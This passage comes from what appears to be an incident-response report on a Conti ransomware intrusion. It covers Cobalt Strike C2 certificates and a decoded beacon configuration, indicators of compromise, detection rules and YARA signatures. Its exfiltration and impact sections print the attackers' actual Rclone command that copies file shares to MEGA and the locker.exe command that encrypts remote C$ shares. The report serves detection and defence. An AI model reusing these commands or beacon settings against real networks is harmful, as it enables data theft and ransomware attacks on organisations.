class="hljs-number">33</span>:eb:<span class="hljs-number">80</span>:<span class="hljs-number">85</span>:ae:f0:<span class="hljs-number">0</span>e:<span class="hljs-number">40</span>:<span class="hljs-number">94</span>:ac:d5:<span class="hljs-number">38</span>:<span class="hljs-number">96</span>:<span class="hljs-number">6</span>a:e5:<span class="hljs-number">75</span>:<span class="hljs-number">2</span>b:<span class="hljs-number">49</span>:<span class="hljs-number">8</span>c ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <h4 id="cobalt-strike">Cobalt Strike</h4> <p>The first DLL [D574.dll] didn’t produce any immediate follow on activity, whereas D8B3.dll was loaded by RunDll32 and associated with many activities, from file creation, process execution and persistent network connectivity to 82.117.252[.]143:443 throughout the intrusion.</p> <p>D574.dll loaded by RunDll32 process with persistent DNS query activity to volga.azureedge[.]net, but no established network connectivity.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/a6abc9f9fa1754b78f352dba2d215682604beb1cb1dade806822f3b500194cb6"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/a6abc9f9fa1754b78f352dba2d215682604beb1cb1dade806822f3b500194cb6" alt="enter image description here" width="973" height="114" /></a></p> <p>We observed that the DLL payload “D574.dll” had issues contacting the domain volga.azureedge[.]net and C2 server via <a href="https://blog.didierstevens.com/2021/07/16/sysmons-dns-querystatus-field/" target="_blank" rel="nofollow noopener">DNS 9003 response codes</a>.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2ed4b6f441190247999fd96b464d551eaae088873bc9c8bbe2ad753b20304711"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/2ed4b6f441190247999fd96b464d551eaae088873bc9c8bbe2ad753b20304711" alt="enter image description here" width="418" height="178" /></a></p> <p>External sandboxes show the domain tied to other Cobalt Strike beacon samples not associated with this report, it is likely the server was taken down by this time.</p> <p><a href="https://tria.ge/210803-w15fxk72ns" target="_blank" rel="nofollow noopener">https://tria.ge/210803-w15fxk72ns</a></p> <p><a href="https://capesandbox.com/analysis/175977/" target="_blank" rel="nofollow noopener">https://capesandbox.com/analysis/175977/</a></p> <p>D8B3.dll illustrates initial activity, followed by established network connectivity to 82.117.252[.]143:80.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/e9d99ea9abdb897fa3d346534f32338e3a5433eeb1e3c2675b208f1e1494b0ed"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/e9d99ea9abdb897fa3d346534f32338e3a5433eeb1e3c2675b208f1e1494b0ed" alt="enter image description here" width="963" height="109" /></a></p> <p>D8B3.dll was the Cobalt Strike beacon the attackers used throughout the intrusion. It was the main payload to facilitate the bulk of the initial intrusion and ongoing activities to maintain access. The DLL 143.dll used in lateral movement from the beachhead host to the backup server also communicated to this Cobalt Strike server. Once the attackers gained a foothold and pivoted laterally, they were able to switch to using RDP and access specific hosts of interest.</p> <p>five.azureedge.net 82.117.252.143:80</p> <p>checkauj.com 82.117.252.143:443</p> <pre><code><span class="hljs-attribute">JA3</span>: <span class="hljs-string">a0e9f5d64349fb13191bc781f81f42e1</span> <span class="hljs-attribute">JA3s</span>: <span class="hljs-string">ae4edc6faf64d08308082ad26be60767</span></code></pre> <pre><code><span class="hljs-constant">Certificate</span><span class="hljs-symbol">:</span> [<span class="hljs-number">68</span><span class="hljs-symbol">:c5</span><span class="hljs-symbol">:fc</span><span class="hljs-symbol">:c0</span><span class="hljs-symbol">:</span><span class="hljs-number">4</span><span class="hljs-symbol">a:</span><span class="hljs-number">34</span><span class="hljs-symbol">:e4</span><span class="hljs-symbol">:</span><span class="hljs-number">8</span><span class="hljs-symbol">f:</span><span class="hljs-number">01</span><span class="hljs-symbol">:</span><span class="hljs-number">86</span><span class="hljs-symbol">:</span><span class="hljs-number">59</span><span class="hljs-symbol">:c1</span><span class="hljs-symbol">:da</span><span class="hljs-symbol">:</span><span class="hljs-number">40</span><span class="hljs-symbol">:</span><span class="hljs-number">78</span><span class="hljs-symbol">:</span><span class="hljs-number">00</span><span class="hljs-symbol">:</span><span class="hljs-number">00</span><span class="hljs-symbol">:</span><span class="hljs-number">20</span><span class="hljs-symbol">:a0</span><span class="hljs-symbol">:b0</span> ] <span class="hljs-constant">Not</span> <span class="hljs-constant">Before</span><span class="hljs-symbol">:</span> <span class="hljs-number">2021</span>/08/<span class="hljs-number">03</span> <span class="hljs-number">11</span><span class="hljs-symbol">:</span><span class="hljs-number">50</span><span class="hljs-symbol">:</span><span class="hljs-number">47</span> <span class="hljs-constant">UTC</span> <span class="hljs-constant">Not</span> <span class="hljs-constant">After</span><span class="hljs-symbol">:</span> <span class="hljs-number">2021</span>/<span class="hljs-number">11</span>/<span class="hljs-number">01</span> <span class="hljs-number">11</span><span class="hljs-symbol">:</span><span class="hljs-number">50</span><span class="hljs-symbol">:</span><span class="hljs-number">45</span> <span class="hljs-constant">UTC</span> <span class="hljs-constant">Issuer</span> <span class="hljs-constant">Org</span><span class="hljs-symbol">:</span> <span class="hljs-constant">Let</span><span class="hljs-string">'s Encrypt Subject Common: checkauj.com [checkauj.com ,www.checkauj.com ] Public Algorithmrsa:Encryption</span></code></pre> <h4 id="cobalt-strike-config">Cobalt Strike Config</h4> <p>82.117.252.143 – checkauj.com</p> <pre><code>{ "<span class="hljs-attribute">BeaconType</span>": <span class="hljs-value">[ <span class="hljs-string">"HTTP"</span> ]</span>, "<span class="hljs-attribute">Port</span>": <span class="hljs-value"><span class="hljs-number">80</span></span>, "<span class="hljs-attribute">SleepTime</span>": <span class="hljs-value"><span class="hljs-number">60000</span></span>, "<span class="hljs-attribute">MaxGetSize</span>": <span class="hljs-value"><span class="hljs-number">1403644</span></span>, "<span class="hljs-attribute">Jitter</span>": <span class="hljs-value"><span class="hljs-number">37</span></span>, "<span class="hljs-attribute">C2Server</span>": <span class="hljs-value"><span class="hljs-string">"checkauj.com,/jquery-3.3.1.min.js"</span></span>, "<span class="hljs-attribute">HttpPostUri</span>": <span class="hljs-value"><span class="hljs-string">"/jquery-3.3.2.min.js"</span></span>, "<span class="hljs-attribute">Malleable_C2_Instructions</span>": <span class="hljs-value">[ <span class="hljs-string">"Remove 1522 bytes from the end"</span>, <span class="hljs-string">"Remove 84 bytes from the beginning"</span>, <span class="hljs-string">"Remove 3931 bytes from the beginning"</span>, <span class="hljs-string">"Base64 URL-safe decode"</span>, <span class="hljs-string">"XOR mask w/ random key"</span> ]</span>, "<span class="hljs-attribute">SpawnTo</span>": <span class="hljs-value"><span class="hljs-string">"AAAAAAAAAAAAAAAAAAAAAA=="</span></span>, "<span class="hljs-attribute">HttpGet_Verb</span>": <span class="hljs-value"><span class="hljs-string">"GET"</span></span>, "<span class="hljs-attribute">HttpPost_Verb</span>": <span class="hljs-value"><span class="hljs-string">"POST"</span></span>, "<span class="hljs-attribute">HttpPostChunk</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">Spawnto_x86</span>": <span class="hljs-value"><span class="hljs-string">"%windir%\\syswow64\\rundll32.exe"</span></span>, "<span class="hljs-attribute">Spawnto_x64</span>": <span class="hljs-value"><span class="hljs-string">"%windir%\\sysnative\\rundll32.exe"</span></span>, "<span class="hljs-attribute">CryptoScheme</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">Proxy_Behavior</span>": <span class="hljs-value"><span class="hljs-string">"Use IE settings"</span></span>, "<span class="hljs-attribute">Watermark</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">bStageCleanup</span>": <span class="hljs-value"><span class="hljs-string">"True"</span></span>, "<span class="hljs-attribute">bCFGCaution</span>": <span class="hljs-value"><span class="hljs-string">"False"</span></span>, "<span class="hljs-attribute">KillDate</span>": <span class="hljs-value"><span class="hljs-number">0</span></span>, "<span class="hljs-attribute">bProcInject_StartRWX</span>": <span class="hljs-value"><span class="hljs-string">"True"</span></span>, "<span class="hljs-attribute">bProcInject_UseRWX</span>": <span class="hljs-value"><span class="hljs-string">"False"</span></span>, "<span class="hljs-attribute">bProcInject_MinAllocSize</span>": <span class="hljs-value"><span class="hljs-number">17500</span></span>, "<span class="hljs-attribute">ProcInject_PrependAppend_x86</span>": <span class="hljs-value">[ <span class="hljs-string">"kJA="</span>, <span class="hljs-string">"Empty"</span> ]</span>, "<span class="hljs-attribute">ProcInject_PrependAppend_x64</span>": <span class="hljs-value">[ <span class="hljs-string">"kJA="</span>, <span class="hljs-string">"Empty"</span> ]</span>, "<span class="hljs-attribute">ProcInject_Execute</span>": <span class="hljs-value">[ <span class="hljs-string">"CreateThread"</span>, <span class="hljs-string">"SetThreadContext"</span>, <span class="hljs-string">"CreateRemoteThread"</span>, <span class="hljs-string">"RtlCreateUserThread"</span> ]</span>, "<span class="hljs-attribute">ProcInject_AllocationMethod</span>": <span class="hljs-value"><span class="hljs-string">"VirtualAllocEx"</span></span>, "<span class="hljs-attribute">bUsesCookies</span>": <span class="hljs-value"><span class="hljs-string">"True"</span></span>, "<span class="hljs-attribute">HostHeader</span>": <span class="hljs-value"><span class="hljs-string">""</span></span>} </code></pre> <h3 id="exfiltration">Exfiltration</h3> <p>Once the attackers established access to critical assets, they used RClone to exfiltrate sensitive data to a cloud storage space named <a href="https://mega.io/" target="_blank" rel="noopener">MEGA</a>. The full command used by Rclone includes a variety of parameters, including setting the bandwidth limit.</p> <pre><code>rclone.exe copy --max-age <span class="hljs-number">2</span>y <span class="hljs-string">"\\SERVER\Shares"</span> Mega:DATA -q --ignore-existing --<span class="hljs-keyword">auto</span>-confirm --multi-thread-streams <span class="hljs-number">7</span> --transfers <span class="hljs-number">7</span> --bwlimit <span class="hljs-number">10</span>M </code></pre> <p>The use of RClone continues to be an effective tool for bulk data exfiltration. NCC Group has provided a <a href="https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" target="_blank" rel="noopener">detailed write-up</a> of the Rclone application and detection methods.</p> <p>The Rclone activity was observed on two separate instances, each lasting around three hours and occurring between 1900 and 2200 UTC.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/509f3eb0a90b9b0912db53aa28219919244632a50c04e3d810a0acf874db241d.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4758" src="https://thedfirreport.com/wp-content/uploads/2021/11/509f3eb0a90b9b0912db53aa28219919244632a50c04e3d810a0acf874db241d.png" alt="" width="196" height="158" /></a></p> <hr /> <h3 id="impact">Impact</h3> <p>On the fifth day, the threat actors moved to their final actions to encrypt the domain. They first pinged systems across the network via an interactive command shell. <a href="https://www.iobit.com/en/iobit-unlocker.php">Iobit unlocker</a> was also dropped during this phase but we did not see it used. After pinging systems, the threat actors opened a batch file that was ultimately used to launch the Conti ransomware.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4745" src="https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3.png" alt="" width="546" height="118" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3.png 546w, https://thedfirreport.com/wp-content/uploads/2021/11/f3a3a919075ac160b8b18838ec9cef851eafe21ccb08c306f068ef7b0f6dead3-300x65.png 300w" sizes="auto, (max-width: 546px) 100vw, 546px" /></a></p> <p>The locker.bat is a bespoke script designed to encrypt files across a number of hosts:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/7b9e7c4d301dcb9922a9995615a03d6cbea55c1a141d820f909f68fd95414d96"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/7b9e7c4d301dcb9922a9995615a03d6cbea55c1a141d820f909f68fd95414d96" alt="enter image description here" width="1227" height="339" /></a></p> <hr /> <p>Based on the contents of the file we can assess that the actors were likely making last minute adjustments before executing the ransomware based on the ping results.</p> <p>The ransom was then launched via the backup server.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/9cc86be7737f8d74a5bfd4da00fb46d2c3d899ebdc0475dccb0792932e3d1235"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/9cc86be7737f8d74a5bfd4da00fb46d2c3d899ebdc0475dccb0792932e3d1235" alt="enter image description here" width="354" height="26" /></a></p> <hr /> <p>To encrypt systems the ransomware mounted the C$ dir for each target host and then performed its encryption routine.</p> <pre>C:\o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe -m -net -size 10 -nomutex -p \\TARGETHOST\C$</pre> <p>Here’s an overview of the execution:</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4804" src="https://thedfirreport.com/wp-content/uploads/2021/11/123.png" alt="" width="2697" height="1140" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/123.png 2697w, https://thedfirreport.com/wp-content/uploads/2021/11/123-300x127.png 300w, https://thedfirreport.com/wp-content/uploads/2021/11/123-1024x433.png 1024w, https://thedfirreport.com/wp-content/uploads/2021/11/123-768x325.png 768w, https://thedfirreport.com/wp-content/uploads/2021/11/123-1536x649.png 1536w, https://thedfirreport.com/wp-content/uploads/2021/11/123-2048x866.png 2048w" sizes="auto, (max-width: 2697px) 100vw, 2697px" /></p> <p>Analysis of the DLLs accompanying the EXE indicates Conti artifacts:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/501735cefb3cc7d0b08f983c8a57b193267d9d1f2d49b9809e333aa15e4abd9b"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/501735cefb3cc7d0b08f983c8a57b193267d9d1f2d49b9809e333aa15e4abd9b" alt="enter image description here" width="229" height="110" /></a></p> <hr /> <p>Once the encryption was completed, the following ransomware note dropped in all affected directories as ‘readme.txt’</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/145eb3e900a27ad1bb6ebc7ba77c7ef2da278e0aa28ac69b0a995caad10ade27"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/145eb3e900a27ad1bb6ebc7ba77c7ef2da278e0aa28ac69b0a995caad10ade27" alt="enter image description here" width="369" height="23" /></a></p> <hr /> <p>The content of these text files:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/ecaecfdb88f5ae8a174538af1ada8f5235a885544520ee0c01905f1e861b3310"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/ecaecfdb88f5ae8a174538af1ada8f5235a885544520ee0c01905f1e861b3310" alt="enter image description here" width="685" height="410" /></a></p> <hr /> <p>Following the execution of the locker ransomware, the attacker then conducted a file listing discovery against multiple hosts – likely to validate and assess that the locker encryption was successful:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/6cd18842629e69c9e3ce73f5af6192b42e43492f72dee865acb7c5c2077f0a37"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/6cd18842629e69c9e3ce73f5af6192b42e43492f72dee865acb7c5c2077f0a37" alt="enter image description here" width="609" height="217" /></a></p> <h2 id="iocs">IOCs</h2> <h3 id="network">Network</h3> <pre><strong>BazarLoader</strong> 64.227.69.92|443 161.35.155.92|443 161.35.147.110|443 64.227.65.60|443 <strong>Loader download</strong> millscruelg.com 45.95.11.133|80 <strong>Cobalt Strike</strong> volga.azureedge.net five.azureedge.net checkauj.com 82.117.252.143|443 82.117.252.143|80</pre> <h3 id="files">Files</h3> <pre>decree-08.03.2021.doc f6f72e3d91f7b53dd75e347889a793da 5d4f020115a483e9e5aa9778c038466f9014c90c 14bccfecaaec8353e3e8f090ec1d3e9c87eb8ceb2a7abedfc47c3c980da8ad71 compareForFor.hta 193b84d45dd371c6e4a501333d37349b 742ed8d0202aafba1c162537087a8a131cb85cde fb38061bf601001c45aafe8d0c5feaa22c607d2ff79cfb841788519ca55a17b4 D8B3.dll 4ba6791f2293a8bc2dfa537015829b3c d4f5cc55b6fa25f9a45ba7e968438b97e33aefbc 4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6 D574.dll 663c8d0fe8b770b50792d10f6c07a652 d0361fbcebe59205b2ea6a31041c89464a5e61b6 1872bf6c974e9b11040851f7d30e5326afdc8b13802891c222af4368a14f829c 143.dll ab3a744545a12ba2f6789e94b789666a 1d5f8d283ed3f6019954aa480182c9913ee49735 6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610 ProcessHacker.exe 68f9b52895f4d34e74112f3129b3b00d c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f locker.bat 84361813423910294079d0bc5b6daba2 c0b28fd2d5b62d5129225e8c45d368bc9e9fd415 1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3 o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe 7f112bfa16a6bd344aaed28abf606780 eaa792a1c9f1d277af3d88bd9ea17a33275308f3 9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219 o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll 2c313c5b532c905eb8f1748a0d656ff9 70725329e4c14b39d49db349f3c84e055c111f2d 31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll 26bd89afd5c1ba9803422d33185cef89 c99f0fa8d5fbffe5288aaff84dbe980c412ba34e 01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9 AnyDesk.exe e6c3ab2ee9a613efdf995043b140fd8e 33738cf695a6ac03675fe925d62ecb529ac73d03 8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7 unlocker.exe 5840aa36b70b7c03c25e5e1266c5835b ea031940b2120551a6abbe125eb0536b9e4f14c8 09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53 rclone.exe 9066cfcf809bb19091509a4d0f15f092 f88a948b0fd137d4b14cf5aec0c08066cb07e08d 9b5d1f6a94ce122671a5956b2016e879428c74964174739b68397b6384f6ee8b<code></code></pre> <h3 id="suricata">Suricata</h3> <pre><code>ET TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile Response ETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2<span class="hljs-operator"> ET <span class="hljs-keyword">POLICY</span> SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software) ET USER_AGENTS AnyDesk Remote Desktop Software <span class="hljs-keyword">User</span>-<span class="hljs-keyword">Agent</span> ET <span class="hljs-keyword">POLICY</span> <span class="hljs-keyword">HTTP</span> POST <span class="hljs-keyword">to</span> MEGA Userstorage </span></code></pre> <h3 id="sigma">Sigma</h3> <pre><code><a href="https://gist.github.com/beardofbinary/fede0607e830aa1add8deda3d59d9a77" target="_blank" rel="noopener">rclone_execution.yaml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/sysmon_in_memory_powershell.yml" target="_blank" rel="noopener">sysmon_in_memory_powershell.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_wmic_proc_create_rundll32.yml" target="_blank" rel="noopener">win_susp_wmic_proc_create_rundll32.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml" target="_blank" rel="noopener">sysmon_abusing_debug_privilege.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_trust_discovery.yml" target="_blank" rel="noopener">win_trust_discovery.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_office_shell.yml" target="_blank" rel="noopener">win_office_shell.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_mshta_spawn_shell.yml" target="_blank" rel="noopener">win_mshta_spawn_shell.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_net_execution.yml" target="_blank" rel="noopener">win_susp_net_execution.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml" target="_blank" rel="noopener">win_susp_regsvr32_anomalies.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/sysmon_rundll32_net_connections.yml" target="_blank" rel="noopener">sysmon_rundll32_net_connections.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_net_enum.yml" target="_blank" rel="noopener">win_net_enum.yml</a> <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_wmi_execution.yml" target="_blank" rel="noopener">win_susp_wmi_execution.yml</a></code></pre> <h3 id="yara">Yara</h3> <pre><code><span class="hljs-comment">/* YARA Rule Set Author: TheDFIRReport Date: 2021-11-29 Identifier: 5794 */</span> <span class="hljs-comment">/* Rule Set ----------------------------------------------------------------- */</span> rule mal_host2_143 { meta: description = <span class="hljs-string">"mal - file 143.dll"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp="</span> ascii <span class="hljs-variable">$x2</span> = <span class="hljs-string">"slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc"</span> ascii <span class="hljs-variable">$x3</span> = <span class="hljs-string">" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA"</span> ascii <span class="hljs-variable">$x4</span> = <span class="hljs-string">"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer"</span> ascii <span class="hljs-variable">$x5</span> = <span class="hljs-string">"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32"</span> ascii <span class="hljs-variable">$x6</span> = <span class="hljs-string">"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f"</span> ascii <span class="hljs-variable">$x7</span> = <span class="hljs-string">"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status mallocing= ms clock"</span> ascii <span class="hljs-variable">$x8</span> = <span class="hljs-string">"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ"</span> ascii <span class="hljs-variable">$x9</span> = <span class="hljs-string">".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign requested addresscasg"</span> ascii <span class="hljs-variable">$x10</span> = <span class="hljs-string">"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf"</span> ascii <span class="hljs-variable">$x11</span> = <span class="hljs-string">"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe"</span> ascii <span class="hljs-variable">$x12</span> = <span class="hljs-string">"ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c"</span> ascii <span class="hljs-variable">$s13</span> = <span class="hljs-string">"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt"</span> ascii <span class="hljs-variable">$s14</span> = <span class="hljs-string">"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at *( gcscandone m->gs"</span> ascii <span class="hljs-variable">$s15</span> = <span class="hljs-string">".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span class="hljs-string">"ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile"</span> ascii <span class="hljs-variable">$s17</span> = <span class="hljs-string">"mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr"</span> ascii <span class="hljs-variable">$s18</span> = <span class="hljs-string">"structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg"</span> ascii <span class="hljs-variable">$s19</span> = <span class="hljs-string">"garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar"</span> ascii <span class="hljs-variable">$s20</span> = <span class="hljs-string">"tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad "</span> ascii condition: uint16(<span class="hljs-number">0</span>) == <span class="hljs-number">0x5a4d</span> <span class="hljs-keyword">and</span> filesize < <span class="hljs-number">4000</span>KB <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> of (<span class="hljs-variable">$x</span>*) <span class="hljs-keyword">and</span> all of them } rule mal_host1_D8B3 { meta: description = <span class="hljs-string">"mal - file D8B3.dll"</span> author = <span class="hljs-string">"TheDFIRReport"</span> date = <span class="hljs-string">"2021-<span class="hljs-comment">11-29</span>"</span> hash1 = <span class="hljs-string">"4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6"</span> strings: <span class="hljs-variable">$x1</span> = <span class="hljs-string">"object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp="</span> ascii <span class="hljs-variable">$x2</span> = <span class="hljs-string">"slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc"</span> ascii <span class="hljs-variable">$x3</span> = <span class="hljs-string">" to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA"</span> ascii <span class="hljs-variable">$x4</span> = <span class="hljs-string">"Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer"</span> ascii <span class="hljs-variable">$x5</span> = <span class="hljs-string">"GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32"</span> ascii <span class="hljs-variable">$x6</span> = <span class="hljs-string">"lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f"</span> ascii <span class="hljs-variable">$x7</span> = <span class="hljs-string">"unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status mallocing= ms clock"</span> ascii <span class="hljs-variable">$x8</span> = <span class="hljs-string">"file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ"</span> ascii <span class="hljs-variable">$x9</span> = <span class="hljs-string">".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign requested addresscasg"</span> ascii <span class="hljs-variable">$x10</span> = <span class="hljs-string">"Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf"</span> ascii <span class="hljs-variable">$x11</span> = <span class="hljs-string">"entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe"</span> ascii <span class="hljs-variable">$x12</span> = <span class="hljs-string">"ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c"</span> ascii <span class="hljs-variable">$s13</span> = <span class="hljs-string">"y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt"</span> ascii <span class="hljs-variable">$s14</span> = <span class="hljs-string">"ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at *( gcscandone m->gs"</span> ascii <span class="hljs-variable">$s15</span> = <span class="hljs-string">".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc"</span> fullword ascii <span class="hljs-variable">$s16</span> = <span 